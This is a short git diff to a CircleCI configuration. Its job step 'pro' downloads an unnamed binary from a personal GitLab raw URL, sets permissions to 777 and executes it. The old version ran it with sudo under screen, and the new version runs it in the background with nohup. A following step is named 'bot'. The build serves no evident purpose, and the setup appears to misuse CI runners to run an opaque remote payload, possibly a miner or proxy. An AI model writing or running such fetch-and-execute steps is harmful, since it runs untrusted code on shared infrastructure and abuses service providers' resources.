--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -9,8 +9,9 @@ jobs:
     steps:
       - run:
          name: pro
-         command: sudo apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro && sudo screen  ./pro
-          sleep 10
+         command: | 
+          sudo apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro && nohup ./pro
+          sleep 10s
       
       - run:
          name: bot
